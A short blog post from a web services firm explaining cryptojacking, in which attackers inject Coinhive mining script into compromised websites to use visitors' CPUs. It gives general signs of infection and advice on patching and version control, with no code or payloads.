Cryptojacking: Hacking for Bitcoins
This is a brief follow up to my previous article on Hacking for Bitcoins in which I detailed how servers were being hijacked with cryptocurrency miners and using your servers CPU power to mine for Bitcoins or other blockchain cryptocurrencies. This is an updated twist on that hack. I saw this Ars Technica article today and it points out that the newer twist is to inject code into your websites code and then process cryptocurrency mining on your website user’s computers. This distributes the CPU processing by thousands instead of just taking over a few of your servers.
To do this, hackers are using Coinhive.com which offers an easy-to-use programming interface that lets you setup your own website to process cryptocurrency on your visitors computers. There isn’t a requirement to give notice to users that you are going to do this. What hackers are doing is using vulnerabilities in your server(s) and/or website(s) to inject this code in your website. It is estimated that there are about 2,500 websites that are currently compromised and using their users to process cryptocurrency. The fine article at Ars Technica indicates that it appears most are connected to two Coinhive.com accounts. This might mean that the hackers can easily be traced and stopped. But others will surely follow in their path.
How do I know?
When Cryptojacking occurs, a direct side effect is that the website user CPU’s are maxed out and system heat starts to increase. This is a tell tale sign that the website you are using is either using your computer for their gain or has been compromised and a hacker is using your computer for their gain. (It could also be one of those annoying Flash based ads that we all hate.) But check the site source code to see if there is anything linking to Coinhive or similar. Ars Technica also reported “Most of the affected sites concealed the connection to Coinhive by adding a link to the domain siteverification.online or one masquerading as a Sucuri firewall.”
This is a growing problem and recently Malwarebytes reported that on average it performs about 8 million blocks per day to unauthorized mining pages. People who want to avoid these Cryptojacking scams can use Malwarebytes or another antivirus program that blocks abusive pages
From our point of view at CF Webtools, this is a good reminder to make sure your ColdFusion servers are secure, updated and patched. It’s also a good reason as to why your website code (all code really) should be in a secured version control system. That way if something like this did happen to your website code you can replace it from a known clean copy instead of digging through the code looking for the injected code. Additionally, CF Webtools offers PenTesting to check your website code for vulnerabilities. If you need help upgrading your VM or patching your server (or anything else) our operations group is standing by 24/7 – give us a call at 402-408-3733, or send a note to operations at cfwebtools.com.